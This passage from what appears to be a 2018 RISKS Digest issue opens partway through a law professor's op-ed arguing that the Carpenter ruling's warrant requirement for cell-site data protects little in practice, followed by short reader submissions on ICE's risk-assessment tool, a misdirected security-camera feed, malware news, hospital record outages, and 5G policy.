    Consider first the core constitutional protection on which Chief Justice
    Robert's opinion in Carpenter hinged -- the requirement of a warrant based
    on probable cause from a judge before the police can acquire cell-site
    records that allow for detailed physical tracking of suspects' movements.

    >From now on, the police will usually have to get a warrant before seeking
    such information. But that offers limited protection. One reason: In other
    Fourth Amendment cases, the Court has held that it is not just life-tenured
    federal judges who can issue warrants. A warrant can also be obtained from
    a range of other officials, including municipal court clerks who have no law
    training and no tenure protection. Such clerical staff lack the skills and
    incentives to examine warrant applications closely to determine compliance
    with the law. Still, they are allowed to issue warrants.

    Even where there are no such court clerks, it is well known that police and
    prosecutors go ``judge shopping'' when a physical search or arrest is in
    play. Judges have varying reputations for being more or less careful in
    scrutinizing warrant applications. It is often well known which judges in a
    city or courthouse are more or less scrupulous. When police have a weak
    warrant application, they have a strong incentive to avoid judges who will
    give it a close read.

    These weaknesses in the warrant regime for physical searches or arrests are
    exacerbated when electronic data is at issue. Warrant applications for cell
    tower records often rest on technical details about the geographic and
    temporal scope of the search. These applications might in theory seek a
    quite varied range of information, including the target's location, the
    number of calls he made, and the manner in which he used apps.

    Review of the application will also require fine judgments about when
    information can be shared with other law enforcement agencies and government
    officials. Just because a prosecutor can obtain electronic data, for
    example, that surely doesn't mean she can hand it over to, say, a political
    appointee in the White House or a Department of Transportation employee who
    happens to be the subject's boyfriend.

    Because close scrutiny by an experienced and independent judge has become so
    easy to avoid, there is no guarantee these questions matters will get
    careful and independent consideration -- even if a warrant is sought and
    issued consistent with the main holding of Carpenter.

    The hurdle of ``probable cause'' has also been steadily lowered

    Assume that police are before a scrupulous judge. Even then, the background
    Fourth Amendment rules mean that they have a light burden to bear. As Chief
    Justice Robert's opinion today stresses, a warrant can be issued only based
    on ``probable cause.'' But in a series of earlier cases about physical
    searches, the Court has winnowed down the ``probable cause'' requirement to
    the showing of a mere ``fair probability'' that evidence of a crime will be
    found.

    This ``fair probability'' requirement has become easier to satisfy in recent
    decades because federal and state legislatures have created sweeping
    penalties for conspiracies to commit crimes and for accomplices.

    Showing a ``fair probability'' of a conspiracy to commit a crime is not
    difficult. Under federal law, for example, a criminal conspiracy
    exists if there's an agreement to commit any criminal act in the
    future, and one step -- even a lawful one -- taken to that end. In
    one case, for example, a Google search served as the ``overt act'' for
    an elaborate conspiracy charge, even in the absence of evidence of
    actual planned criminal conduct.

    This sweeping definition of criminal liability interacts with the weak
    ``probable cause'' rule. Police need only show a ``fair probability''
    that a single lawful action has been taken in relation to a criminal
    agreement, and they are entitled to a warrant. This is not hard to
    do.

    This problem is pervasive across Fourth Amendment law. But it has
    particular significance to cell-site locational data. Such data maps
    the movements of a group of people -- precisely the evidence that is
    routinely relevant to conspiracy charges. So with a conspiracy theory
    in hand, it will often be very easy for the police to meet the
    (exceedingly weak) probable cause standard.

    Would a warrant requirement have made a practical difference in
    Carpenter's case?

    In Carpenter's case, investigators had a confession from one of the
    participants in the string of armed robberies. They also had the cell
    numbers of other participants, including Carpenter's. These two
    pieces of information would almost certainly have been enough to allow
    the government to get a warrant on a conspiracy theory of probable
    cause.

    But imagine that the investigator couldn't even pull together evidence
    showing probable cause of a conspiracy. Imagine that they instead
    play fast and loose with the contents of the warrant application. For
    example, the application might rest on some dubious evidence, and the
    investigator might consciously choose not to confirm its accuracy.
    Once charges have been filed, could a defendant get the locational
    data thrown out on the grounds that the warrant application was based
    on false pretenses?

    Once again, general Fourth Amendment law makes this possible in theory
    but unlikely in practice. To get evidence acquired by a warrant
    tossed out of court, a defendant must show that an investigator acted
    with ``reckless disregard'' in preparing a warrant application. In most
    states and in federal court, there is no rule that permits the
    defendant to examine police or prosecutor records. Hence, the
    defendant often must make this recklessness showing without any
    documentary evidence of what the police did.

    It is therefore usually practically impossible for most defendants to
    challenge flawed search warrants. Again, warrants for electronic data
    are no different.

    Even if a defendant succeeds in getting a warrant quashed, moreover,
    the Supreme Court has said that a reviewing court of appeals must look
    again at the warrant -- now placing a thumb on the scales in favor of
    the investigating officer. In effect, when the government loses the
    rare case in which a defendant can show a warrant to be flawed, it
    gets a second chance to have the warrant restored by a court of
    appeals.

    Prosecutors can use illicitly obtained information if a suspect
    testifies

    Still, lean your imagination into the wind to imagine a defendant who
    has overcome all these constraints, and had a warrant quashed. The
    evidence from that flawed warrant can still be introduced at trial if
    the defendant chooses to testify. The Supreme Court established that
    rule in the 1971 case of Harris v. New York, on the grounds that if
    the defendant could give testimony, the government had the concomitant
    right to undermine it by whatever information was in its hands.

    As a result, even when the government has illegally acquired evidence,
    its possession of that evidence creates a strong incentive for
    defendants not to take the stand. Needless to say, this will often
    make the prosecutor's job easier.

    If a defendant chooses not to testify, that is still not the end of
    the story. The government can also argue that information gathered
    unlawfully without a warrant should be admitted because there was an
    emergency. Chief Justice Roberts explicitly carved out an emergency
    exception in his Carpenter opinion, citing the possibility of ``bomb
    threats, active shootings, and child abductions.'' In such cases, no
    warrant is required.

    Also, if the locational data was acquired without a warrant before
    Carpenter was decided, the Court held that it need not be kept out.
    Carpenter hence helps no one whose cell-site locational data was
    acquired before this week. And the Carpenter opinion also leaves open
    the possibility that police can acquire less than seven days of
    cell-site data without a warrant.

    Are there other paths for redress? Someone in Carpenter's shoes,
    whose Fourth Amendment rights have been violated, can technically sue
    the police for damages even if they are not charged with a criminal
    offense. The problem is that the Court has almost completely
    squelched the availability of damages for most constitutional wrongs,
    including the Fourth Amendment, through a series of technical
    anti-plaintiff rules.

    In short, the legal framework of Fourth Amendment remedies has been
    riddled with so many exceptions and loopholes that Carpenter's holding
    that a warrant is required to acquire cell-site locational data is
    likely to impose no great burden on the police.

    If police can't get the information through cellphone companies, they
    will turn up the heat on suspects

    But the facts around the electronic data in Carpenter make the Court's
    holding especially hollow. Locational data is held not only by
    telephone company. It is also contained on a person's phone, even if
    she chooses to disable locational tracking. (Certain apps can track
    locational data produced by a phone's internal sensors without the
    owner's knowledge or permission.) This data is generally accurate to
    a foot or so.

    Police can thus acquire location data -- and much more -- if they ask
    for consent to examine a phone. Extensive psychological research
    shows that most of the time -- especially if the suspect is a woman or
    a racial minority -- suspects are likely to say yes.

    General Fourth Amendment law says police can seek consent to make a
    search. In the physical search context, the Court has consistently
    ignored the fact that people often feel they have no choice but to
    acquiesce.

    Consider the leading Supreme Court case on consent searches, United
    States v. Drayton. Two men are traveling by bus in Florida, when
    police board the bus and question passengers about their trip. The
    first man is asked to ``consent'' to a pat down. He does -- and the
    officer finds blocks of cocaine taped to his groin. After this first
    man is led away in handcuffs, the officer turns to his traveling
    companion and says, ``Mind if I check you?'' The second man agrees.
    Drugs are found in exactly the same spot on his body. The Supreme
    Court holds that he consented to the search.

    My students, encountering Drayton for the first time, often have a
    moment of cognitive dissonance. Why, they wonder, did the suspect
    consent after he saw what happened to his friend? When I point out
    that both men were racial minorities in a jurisdiction with a history
    of police violence, and that neither was highly educated nor socially
    privileged, then the facts start to make more sense.

    Ironically, the Carpenter decision makes it more likely that police
    will aggressively exploit the weaknesses of the Court's consent
    case-law. By making it slightly more hassle to obtain cell-site
    locational data from a telephone company, the Court has encouraged
    police to exploit the frailty of its consent doctrine. That is, by
    making it harder to acquire electronic data from a third party, the
    Court has nudged police toward more forceful and unpleasant
    confrontations with citizens by which ``consent'' can be secured.

    This should not count as a ``success'' for Fourth Amendment freedoms.

    Electronic privacy rests on the rules and remedies that apply to the
    Fourth Amendment generally. In the past 40 years, those rules and
    remedies have been substantially eroded by a Court unwilling to
    constrain police.

    The result today is that even when a decision endorses Fourth
    Amendment protection -- and requires a warrant, as in Carpenter --
    that protection is easy to avoid, and likely ineffectual in practice.

    Aziz Huq is the Frank and Bernice J. Greenberg professor of law at the
    University of Chicago Law School.

    ------------------------------

    Date: June 27, 2018 at 08:09:05 GMT+9
    From: Richard Forno <rfo...@infowarrior.org>
    Subject: ICE hacked its algorithmic risk-assessment tool, so it recommended
    detention for everyone (BoingBoing)

    ICE hacked its algorithmic risk-assessment tool so it recommended detention for everyone

    One of the more fascinating and horrible details in Reuters' thoroughly
    fascinating and horrible long-form report on Trump's cruel border policies
    is this nugget: ICE hacked the risk-assessment tool it used to decide whom
    to imprison so that it recommended that everyone should be detained.

    This gave ICE a kind of empirical facewash for its racist and inhumane
    policies: they could claim that the computer forced them to imprison people
    by identifying them as high-risk. The policy let ICE triple its detention
    rate, imprisoning 43,000 people.

    ICE hacked its algorithmic risk-assessment tool so it recommended detention for everyone

    ------------------------------

    Date: Sat, 30 Jun 2018 08:01:30 +0930
    From: Donald Mackie <don...@iconz.co.nz>
    Subject: Energy company vulnerability allows access to customer accounts

    According to this story a customer alerted the company in November 2017.
    What is interesting is the pace and incompleteness of response, lack of
    information to customers and time for a complete fix.

    Apart from the (sadly) routine nature of the vulnerability story here, one
    of the risks I see is that of testing inherited legacy systems in company
    handovers/changes. A governance and due diligence question.

    Z Energy security breach admitted as CEO fronts and apologises

    Cue A-Z of system security joke.

    ------------------------------

    Date: Wed, 27 Jun 2018 19:18:41 -0700
    From: Richard M Stein <rms...@ieee.org>
    Subject: Internet TV firmware update/soft powerswitch failure

    While on vacation the home we rented was equipped with all manner of
    Internet of mistakes devices, including an Internet-connected television.

    At 0200 one morning, it switched on suddenly. Apparently, the owners --
    out of convenience or pure ignorance -- elected for firmware auto-
    updates.

    The family was startled, as the volume had been boosted by the flash
    memory save and reboot; the legacy off-state was not restored. The
    line-of-sight TV controls remained operative.

    Although the specific TV possesses features that can auto-detect user
    inactivity after a fixed duration, or if there's an extended loss of
    input signal, I cannot help imagining if the upgrade had bricked these
    soft switches, or it possessed a ``thermal runaway'' virus maliciously
    designed to ignite the unit.

    ------------------------------

    Date: Wed, 27 Jun 2018 12:17:44 -0700
    From: Lauren Weinstein <lau...@vortex.com>
    Subject: Widespread Google Home outage: What NOT to do!

    via NNSquad

    There is apparently a widespread -- possibly global -- Google Home
    outage. However, not all units are affected. Some of my units here are
    down, at least one is up. The down units act if they were factory
    reset and tell you to download the Home app. My recommendation is to
    NOT do so! DON'T CHANGE ANYTHING! Give Google time to deal with this
    from the server side.

    ------------------------------

    Date: Wed, 4 Jul 2018 09:13:06 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: Cruel pranksters made NYC Internet kiosks play ice-cream truck tunes
    (Engadget)

    Cruel pranksters made NYC internet kiosks play ice cream truck tunes

    ------------------------------

    Date: Wed, 27 Jun 2018 19:09:58 +0000
    From: Michael Marking <mar...@tatanka.com>
    Subject: Swann home security camera sends video to wrong user (BBC)

    Home security cam sent video to wrong user

    A leading security camera-maker has sent footage from inside a
    family's home to the wrong person's app.

    Swann Security has blamed a factory error for the data breach --
    which was brought to its attention by the BBC -- and said it was a
    ``one-off'' incident. However, last month another customer reported a
    similar problem saying his version of the same app had received
    footage from a pub's CCTV system. Swann said it was attempting to
    recover the kit involved in this second case. [...]

    The BBC first learned of the problem on Saturday, when a member of
    its staff began receiving motion-triggered video clips from an
    unknown family's kitchen. Until that point, Louisa Lewis had only
    received footage from her own Swann security camera, which she had
    been using since December. The development coincided with Ms
    Lewis's camera running out of battery power and requiring a
    recharge. [...]

    A Swann customer representative told Ms Lewis that nothing could be
    done until after the weekend. And it was only after the matter was
    flagged to the firm's PR agency on Monday that she stopped receiving
    video clips. [...]

    Even if this were a factory error, the system shouldn't have failed
    absent multiple errors: the design of the manufacturing process, even
    given active quality control, should not have been dependent on a
    single point of failure. Most important, this failure mode should not
    have been possible (ok, the likelihood shouldn't have been anything
    but vanishingly small).

    Moreover, this seems to have happened more than once.

    Designers of these systems should, at least as an exercise, treat
    manufacturers, distributors, retailers, and even users as potentially
    hostile entities. This is especially true since firms are highly
    unlikely to have ownership and control of the entire chain of
    operations. For example, the credentials for one unit might
    accidentally be swapped by a retailer for those of another. Gross
    negligence is a form of hostility, and it is grossly negligent to
    assume the absence of human error..

    ------------------------------

    Date: Thu, 28 Jun 2018 12:08:17 +0200
    From: Peter Houppermans <pe...@houppermans.net>
    Subject: Hidden Microsoft Office 365 data gathering (LMG Security)

    I came across this interesting post:

    http://lmgsecurity.com/exposing-the-secret-office-365-forensics-tool/

    Extract: ``An ethical crisis in the digital forensics industry came to a
    head last week with the release of new details on Microsoft's undocumented
    `Activities' API. A previously unknown trove of access and activity logs
    held by Microsoft allows investigators to track Office 365 mailbox activity
    in minute detail. Following a long period of mystery and rumors about the
    existence of such a tool, the details finally emerged, thanks to a video by
    Anonymous and follow-up research by CrowdStrike.

    Now, investigators have access to a stockpile of granular activity data
    going back six months -- even if audit logging was not enabled. For victims
    of Business Email Compromise (BEC), this is huge news, because investigators
    are now far more likely to be able to `rule out' unauthorized access to
    specific emails and attachments.

    Maybe I'm just picky, but I like to know what software is logging what
    activity, due to compliance and confidentiality needs. The two are
    frequently in conflict, so precision is essential.

    >From a privacy perspective, it appears it's time to revert to parchment,
    quill and ink..

    ------------------------------

    Date: Tue, 3 Jul 2018 18:24:27 -0700
    From: Rob Slade <rms...@shaw.ca>
    Subject: Protecting civilians in cyberspace (Just Security)

    Over the years, we've explored (and often shied away from) the idea of
    infosec pros as a kind of military or police force, protecting the general
    public from the digital/cybersecurity bad guys.

    So I find this article on protecting civilians in cyberspace, seemingly by
    people outside the traditional infosec community, quite interesting. The
    emphasis seems to be on human rights, rather than general computer use, but
    there are some intriguing ideas just the same.

    http://www.justsecurity.org/58838/protecting-civilians-cyberspace-ideas-road/

    [Interesting name. It is Never *Just* Security, as (1) it is often
    something else as well, and (2) Security is never Just. PGN]

    ------------------------------

    Date: Tue, 3 Jul 2018 20:27:56 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: Rash of Fortnite cheaters infected by malware that breaks HTTPS
    encryption (Ars Technica)

    Malware can read, intercept, or tamper with the traffic of any
    HTTPS-protected site.

    http://arstechnica.com/information-...cted-by-malware-that-breaks-https-encryption/

    ------------------------------

    Date: Tue, 3 Jul 2018 20:26:39 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: Really dumb malware targets cryptocurrency fans using Macs
    (Ars Technica)

    A command spread through Slack and Discord channels to cryptocurrency users
    is a trap.

    http://arstechnica.com/information-...lware-targets-cryptocurrency-fans-using-macs/

    ------------------------------

    Date: Tue, 3 Jul 2018 17:43:12 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Sony Blunders By Uploading Full Movie to YouTube Instead of Trailer
    (TorrentFreak)

    Sony Pictures Entertainment's movie `Khali the Killer' is on release in the
    United States and, as is customary, a trailer has been uploaded to YouTube.
    However, on closer inspection, it appears that Sony uploaded the entire
    movie in error. Oops.

    http://torrentfreak.com/sony-blunders-uploading-full-movie-youtube-instead-trailer-180703/
    The price is right...

    [Monty Solomon noted this item:
    http://arstechnica.com/gaming/2018/...railer-to-youtube-posts-entire-movie-instead/
    PGN]

    ------------------------------

    Date: Mon, 2 Jul 2018 15:04:13 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Homeland Security subpoenas Twitter for data breach finder's account
    (Zack Whittaker)

    Zack Whittaker for Zero Day | 2 Jul 2018
    http://www.zdnet.com/article/homeland-security-subpoenas-twitter-for-data-breach-finders-account/

    Homeland Security has served Twitter with a subpoena, demanding the account
    information of a data breach finder, credited with finding several large
    caches of exposed and leaking data.

    The New Zealand national, whose name isn't known but goes by the handle
    Flash Gordon, revealed the subpoena in a tweet last month.

    Also: Homeland Security's own IT security is a hot mess, watchdog finds

    The pseudonymous data breach finder regularly tweets about leaked data found
    on exposed and unprotected servers. Last year, he found a trove of almost a
    million patients' data leaking from a medical telemarketing firm. A recent
    find included an exposed cache of law enforcement data by ALERRT, a Texas
    State University-based organization, which trains police and civilians
    against active shooters. The database, secured in March but reported last
    week, revealed that several police departments were under-resourced and
    unable to respond to active shooter situations.

    Homeland Security's export control agency, Immigration and Customs
    Enforcement (ICE), served the subpoena to Twitter on April 24, demanding
    information about the data breach finder's account.

    [Also noted by Gene Wirchenko. PGN]

    ------------------------------

    Date: Tue, 3 Jul 2018 08:39:56 -0700
    From: Lauren Weinstein <lau...@vortex.com>
    Subject: Wikipedia Italy Blocks All Articles in Protest of EU's Ruinous
    Copyright Proposals (Gizmodo)

    NNSquad
    http://gizmodo.com/wikipedia-italy-blocks-all-articles-in-protest-of-eus-r-1827312550

    On Tuesday, Wikipedia Italy set all of its pages to redirect to a
    statement raising awareness for the upcoming vote that (barring some
    legislative wrangling) would make the copyright directive law. The
    statement reads, in part (emphasis theirs): On July 5, 2018, The Plenary
    of the European Parliament will vote whether to proceed with a copyright
    directive proposal which, if approved, will significantly harm the
    openness of the Internet. The directive instead of updating the copyright
    laws in Europe and promoting the participation of all the citizens to the
    society of information, threatens online freedom and creates obstacles to
    accessing the Web, imposing new barriers, filters and restrictions. If the
    proposal would be approved in its current form, it could be impossible to
    share a news article on social networks, or find it through a search
    engine; Wikipedia itself would be at risk.

    Just a taste of what's coming to European Internet users if those laws
    are enacted.

    ------------------------------

    Date: Mon, 2 Jul 2018 23:45:55 -0400
    From: ``Fr. Stevan Bauman'' <father...@indy.net>
    Subject: How a Major Computer Crash Showed the Vulnerabilities of EHRs
    (Medscape)

    Marcia Frellick, Medscape, 14 Jun 2018
    http://www.medscape.com/viewarticle...PEDIT_hospmed&uac=64984BJ&impID=1667063&faf=1

    The recent communications outage at Sutter Health, the largest health system
    in northern California, which cut off access to electronic health records
    (EHRs), highlighted the frequency of such outages and the need for backup
    plans and drills nationwide. [...]

    Andrew Gettinger, MD, chief clinical officer for the Office of the National
    Coordinator for Health Information Technology, part of the US Department of
    Health and Human Services, said all systems need backup plans and pointed to
    the recommendation from the Joint Commission for annual disaster drills.

    ``It's not a question of IS your system going to be unavailable, because I
    think almost every computer system in every context is at some time or
    another not available,'' he told /Medscape Medical News/. ``The question is
    then -- what's the institutional contingency plan?''

    Gettinger said that downtime for computer systems is not unlike other
    disasters health systems plan for regularly. ``It's no different from what
    happens when the power in the building goes out or the water supply goes out
    or you're no longer able to get compressed oxygen or nitrous oxide. I don't
    think patients or doctors really need to be worried about it unnecessarily.''

    All health systems should know about the SAFER guides
    <https://www.healthit.gov/topic/safety/safer-guides>
    (Safety Assurance Factors for EHR Resilience), put in place to address EHR
    safety nationally, Gettinger said. The guides were updated last year.

    Dean Sittig, PhD, a professor at the University of Texas Health's School of
    Biomedical Informatics, helped write those guidelines and also was lead
    author on a study in 2014 <https://www.ncbi.nlm.nih.gov/pubmed/25200197>
    that surveyed US-based healthcare institutions that were part of a
    professional collaborative on their exposure to downtime.

    In that study, researchers found that nearly all (96%) of the 50 large,
    integrated institutions who responded had at least one unplanned downtime in
    the past 3 years and 70% had at least one unplanned downtime greater than 8
    hours in the past 3 years. [...]

    In another paper
    http://www.nejm.org/doi/full/10.1056/NEJMsb1205420
    Sittig wrote that, in April 2010, one third of the hospitals in Rhode Island
    had to delay elective surgeries and divert some patients when an automatic
    antivirus update crashed the system.

    ``You depend on the computer for everything -- registration, scheduling, past
    visit notes, results of laboratory tests. The healthcare system is now
    dependent on the electronic health record to care for patients,'' Sittig told
    /Medscape Medical News/.

    In the Sutter case, a fire-suppression system was activated. Sittig
    explained that the suppressions systems in data centers typically involve an
    alarm going off to alert people to get out of the room, then doors lock and
    all the oxygen is sucked out of the room and replaced with fire-retardant
    gas.

    Because the gas has to be flushed out, then the oxygen levels restored, then
    the computers restarted, ``you're talking probably a minimum of 4-6 hours,''
    Sittig says. ``That's when everything works perfectly.'' He said systems
    should expect accidents to happen and that they will be costly. ``A big
    hospital probably loses at least $1 million per hour when they're down,''
    Sittig said.

    But investments in data protection can be a hard sell. A chief financial
    officer, Sittig said, may say a $3 million backup data center is too
    expensive, for example.

    ``You have to ask them, 'Can you afford to be down 5 hours? That will cost us
    $5 million. So we should spend the $3 million as an insurance policy,' ''
    Sittig said.

    Adding to the problem, he said, is that in the modern healthcare system,
    with an institution that's been using an EHR 5 or more years, many young
    providers have never worked in a place that has a paper system and aren't
    familiar with those operations.

    Sittig added that paper systems are subject to their own dangers -- fire,
    water, and wind, for example.

    But electronic records that make it easy to spread information instantly
    across hospitals, sometimes in many states, also can mean instant, massive
    failures.

    The first thing hospital systems do when a disaster strikes, Sittig says, is
    decide what can be cut, and the first thing to go is usually the elective
    surgeries. Then ambulances may be instructed to take patients elsewhere.
    ``Then you try to discharge the people who aren't very sick. Then they start
    sending people home early. We've created a system where we're relying on an
    electromechanical device that we know is going to break. There's no question
    computers are going to break.''

    ------------------------------

    Date: Sat, 30 Jun 2018 23:13:48 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Apple 'Family Sharing' feature used by scammers to make purchases
    with hacked Apple IDs (Business Insider)

    People are discovering that scammers are controlling their Apple accounts
    using a feature for families to share apps

    When David tried to download apps on his iPhone and iPad recently, he found
    he wasn't able to because his account was linked to something called *Family
    Sharing*.

    That's a feature that Apple introduced in 2014 to make it easier to share
    apps, iCloud storage, and iTunes content like music and movies with up to
    five family members.

    But this was news to David, who says he didn't remember turning on Family
    Sharing. After he dug into his account settings, he received a popup that to
    remove himself from the Family Sharing account he needed to contact a name
    that was in Chinese -- and he had no way to get in touch.

    http://www.businessinsider.com/appl...mers-to-make-purchases-hacked-accounts-2018-6

    ------------------------------

    Date: Tue, 03 Jul 2018 18:50:25 -0700
    From: Gene Wirchenko <ge...@telus.net>
    Subject: ``Trump administration tells FCC to block China Mobile from U.S.''
    (Corinne Reichert)

    Corinne Reichert, ZDNet, 3 Jul 2018
    Mobile access to U.S. telecommunications networks would carry a `substantial
    and unacceptable risk' to national security and law enforcement, the U.S.
    government has said.
    http://www.zdnet.com/article/trump-administration-tells-fcc-to-block-china-mobile-from-us/

    selected text:

    The Federal Communications Commission (FCC) has been advised by the
    Executive Branch to deny China Mobile entry to the United States
    telecommunications industry, citing ``substantial and unacceptable risk to US
    law enforcement and foreign intelligence collection''.

    The Executive Branch, which includes the Departments of Justice, Homeland
    Security, Defense, State, and Commerce, along with the Offices of Science
    and Technology Policy and the US Trade Representative, made the
    recommendation almost seven years after China Mobile International (USA)
    made the application for a certificate under s214 of the Communications Act.

    A 2013 letter [PDF] from counsel for China Mobile USA had noted the ``extreme
    delay'' in granting the licence -- which was originally applied for in
    September 2011 -- saying the delay ``is causing significant and unwarranted
    harm to China Mobile USA's business operations''.

    Huawei Australian chair John Lord last week said the Chinese technology
    giant is the most audited, inspected, reviewed, and critiqued IT company in
    the world, and has never had a national security issue.

    ``After every kind of inspection, audit, review, nothing sinister has
    been found. No wrongdoing, no criminal action or intent, no 'back
    door', no planted vulnerability, and no 'magical kill switch'. In
    fact, in our three decades as a company no evidence of any sort has
    been provided to justify these concerns by anyone -- ever.''

    ------------------------------

    Date: Sat, 30 Jun 2018 13:41:59 +0800
    From: Richard M Stein <rms...@ieee.org>
    Subject: Google is training machines to predict when a patient will die
    (Los Angeles Times)

    http://www.latimes.com/business/tec...l-intelligence-healthcare-20180618-story.html

    ``What impressed medical experts most was Google's ability to sift through
    data previously out of reach: notes buried in PDFs or scribbled on old
    charts. The neural net gobbled up all this unruly information then spat
    out predictions. And it did so far faster and more accurately than
    existing techniques. Google's system even showed which records led it to
    conclusions.

    ``Dean envisions the AI system steering doctors toward certain medications
    and diagnoses. Another Google researcher said existing models miss obvious
    medical events, including whether a patient had prior surgery. The person
    described existing hand-coded models as `an obvious, gigantic roadblock'
    in healthcare. The person asked not to be identified discussing work in
    progress.

    ``For all the optimism over Google's potential, harnessing AI to improve
    healthcare outcomes remains a huge challenge. Other companies, notably
    IBM's Watson unit, have tried to apply AI to medicine but have had limited
    success saving money and integrating the technology into reimbursement
    systems.''

    The perfect *death panel* proxy, and no longer a burden to physicians,
    bioethicists, insurance agents, hospital administrators, and patient
    advocates, Google's Medical Brain AI platform calculates a human life's
    merit score.

    Can this platform factor patient quality of life outcome potential into the
    learning algorithm's neural network processing decisions? What weight would
    this factor possess relative to the others? Under what medical conditions is
    this platform relevant to even consult? What happens if a test result
    applied as an input, such as for blood chemistry, is skewed by a
    contaminated reagent?

    Until proven to improve health care outcomes, if ever, a "blackbox
    warning label'' seems like a wise precaution.
    http://en.wikipedia.org/wiki/Boxed_warning.

    Will Google's Medical Brain employees and immediate family members be
    required to participate in a randomize control trial using the Medical Brain
    AI platform?

    ------------------------------

    Date: July 4, 2018 at 10:18:15 AM GMT+9
    From: Dewayne Hendricks <dew...@warpspeed.com>
    Subject: So What The Heck Does 5G Actually Do? And Is It Worth What The Carriers
    Are Demanding? (Harold Fel)

    Harold Fel, WetMachine, 28 Jun 2018

    http://www.wetmachine.com/tales-of-...-is-it-worth-what-the-carriers-are-demanding/

    It's become increasingly impossible to talk about spectrum policy without
    getting into the fight over whether 5G is a miracle technology that will end
    poverty, war and disease or an evil marketing scam by wireless carriers to
    extort concessions in exchange for magic beans. Mind you, most people never
    talk about spectrum policy at all -- so they are spared this problem in the
    first place. But with T-Mobile and Sprint now invoking 5G as a central
    reason to let them merge, it's important for people to understand precisely
    what 5G actually does. Unfortunately, when you ask most people in Policyland
    what 5G actually does and how it works, the discussion looks a lot like the
    discussion in Hitchhikers Guide To the Galaxy where Deep Thought announces
    that the answer to Life the Universe and Everything is `42'.

    So while not an engineer, I have spent the last two weeks or so doing a deep
    dive on what, exactly does 5G actually do -- with a particular emphasis on
    the recently released 3GPP standard (Release 15) that everyone is
    celebrating as the first real industry standard for 5G. My conclusion is
    that while the Emperor is not naked, that is one Hell of a skimpy thong he's
    got on.

    More precisely, the bunch of different things that people talk about when
    they say `5G': millimeter wave spectrum, network slicing, and something
    called (I am not making this up) `flexible numerology' are real. They
    represent improvements in existing wireless technology that will enhance
    overall efficiency and thus add capacity to the network (and also reduce
    latency). But, as a number of the more serious commentators (such as Dave
    Burstien over here) have pointed out, we can already do these things using
    existing LTE (plain old 4G). Given the timetable for development and
    deployment of new 5G network technology, it will be at least 5 years before
    we see more than incremental improvement in function and performance.

    Put another way, it would be like calling the adoption of a new version of
    Wi-Fi `C5G Wi-Fi.' (Which I am totally going to do from now on, btw, because
    why not?)

    I elaborate more below . . .

    There are a bunch of important questions to keep in mind when evaluating
    what we ought to do about 5G as a policy question. (a) What exactly is 5G?
    (b) How does it compare to existing LTE? and, (c) How much are we being
    asked to pay for it in policy terms?

    What Exactly Do We Mean By CG

    CG technically means `generation'. My favorite explanation can be found in
    this old Best Buy commercial. As a general rule, we use `G' to indicate a
    significant shift in capability, architecture and technology. For example,
    the shift from analog to digital voice in 2G, or the inclusion of limited
    data capability as an overlay to voice in 3G. The shift to 4G was marked by
    a shift to an all packet-switched data network in which voice is supported
    as one feature on the network. In addition, 4G turned out to be fairly
    homogeneous for a variety of reasons I won't get into now. Basically, after
    a brief flirtation by Sprint and a few others with WiMax, all the carriers
    ended up using LTE.

    So the switch to 5G ought to mean a major boost in both technology and
    speed. And it will, eventually. But for now, it's not so much a generational
    shift like the previous shifts but a modest transition over time. By that I
    don't mean simply that we will see 5G networks operating with 4G cores for a
    long time. That's always true. Carriers deployed LTE and still maintained
    (some to this day) 3G networks in parallel. That is necessary so that people
    and businesses can switch legacy equipment at a rational pace. What I mean
    is that the capabilities that are supposed to make 5G so awesome are not
    really that awesome right now, and won't be for at least 5 more years.

    What Makes 5G More Awesome?

    Here is where it gets confusing. You can see a good tutorial on the network
    architecture here. But this represents a relatively recent change in how we
    talk about 5G. Originally, i.e., back in 2015, we were talking about
    millimeter wave as 5G, with nothing else going on in the lower frequencies
    counting as 5G. [...]

    ------------------------------

    Date: Tue, 3 Jul 2018 20:29:22 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: Leaks, riots, and monocles: How a $60 in-game item almost destroyed
    EVE Online (Ars Technica)

    When the developers of EVE Online added expensive in-game vanity items... it
    went poorly.

    http://arstechnica.com/gaming/2018/07/monocles/

    ------------------------------

    Date: Mon, 02 Jul 2018 11:54:05 +0800
    From: Richard M Stein <rms...@ieee.org>
    Subject: Gaming disorder is only a symptom of a much larger problem (WaPo)

    [Suitably revised, this submission might make a good April Fool's comp.risks
    contribution in 2019. And jolt a few CxOs from their Caesar salad lunch. od
    -c output attached below for peace of mind.]

    http://www.washingtonpost.com/opinions/gaming-disorder-is-only-a-symptom-of-a-much-larger-problem/2018/06/29/64f2866a-7a21-11e8-93cc-
    6d3beccdd7a3_story.html


    Mobile electronic devices generate addiction symptoms that mirror those
    caused by nicotine. The iGen -- young people raised on smart phones and
    social media -- are especially vulnerable to screen addiction disorder.

    Would an enterprising state attorney general attempt the equivalent of a
    ``Tobacco Master Settlement Agreement''
    http://en.wikipedia.org/wiki/Tobacco_Master_Settlement_Agreement) against
    mobile device manufacturers, application developers, and social media for
    public health expenditures arising from treatment?

    >From the MSA wikipedia page:

    ``The general theory of these lawsuits was that the cigarettes produced by
    the tobacco industry contributed to health problems among the population,
    which in turn resulted in significant costs to the states' public health
    systems.''

    Recall that the Tobacco MSA amounted to settlement payments from tobacco
    firms for ~$US 200-375B over 25 years to reimburse states for expenses
    arising from tobacco-related illness and disease treatment. The MSA also
    imposed restrictions that prohibited tobacco advertisements toward young
    people -- a core audience for addictive products, and a business model
    impediment that penalizes income capture potential.

    Hypothetically, would substitution of ``mobile devices, apps, and social
    media'' for ``tobacco'' (the MOBASS MSA?) in an equivalent agreement be viable?
    The epidemiological evidence, per states' public health system impact to
    date, might not immediately substantiate this extrapolation. As evidence
    linking tobacco usage to illness accumulated from the 1950s through 1990s,
    so might evidence of screen addiction disorder and the affects it
    introduces.

    The spectacle of mobile device, social media, and application vendors called
    to testify under oath before Congress that ``our products are not addictive''
    would rival the perjury committed by tobacco industry executive
    predecessors. Michael Mann's ``The Insider''
    http://www.imdbcom/title/tt0140352/?ref_=nv_sr_2) might need a sequel!

    ------------------------------

    Date: Sun, 1 Jul 2018 22:43:10 +0100
    From: Michael Kent <michae...@37.org.uk>
